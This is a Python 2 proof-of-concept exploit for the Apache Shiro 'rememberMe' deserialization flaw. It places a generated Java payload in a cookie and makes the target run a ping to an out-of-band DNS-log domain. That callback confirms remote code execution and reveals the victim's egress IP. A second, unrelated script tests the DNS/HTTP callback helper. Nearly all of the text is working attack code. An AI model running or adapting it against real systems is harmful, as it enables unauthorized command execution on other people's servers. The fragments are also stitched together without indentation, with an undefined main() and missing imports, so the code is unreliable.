def poc(url):
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
try:
cloudeye = CloudEye()
domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组
rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码
payload = generator(rce_command, JAR_FILE) # 生成payload
requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求
dnslog = cloudeye.getDnsRecord(delay=2)
if domain in dnslog:
msg = url
for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip
msg += ' - ' + each
return msg
except Exception, e:
pass
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Author: rivir
Date: 2020/2/22
"""
import sys
sys.path.append('../')
from plugin.cloudeye import CloudEye
c = CloudEye()
a = c.getRandomDomain('cdxy')
try:
requests.get('http://' + a, timeout=1)
except Exception:
pass
print c.verifyDNS(delay=0)
print c.verifyHTTP(delay=0)
print c.getDnsRecord(delay=0)
print c.getHttpRecord(delay=0)
if __name__ == "__main__":
main()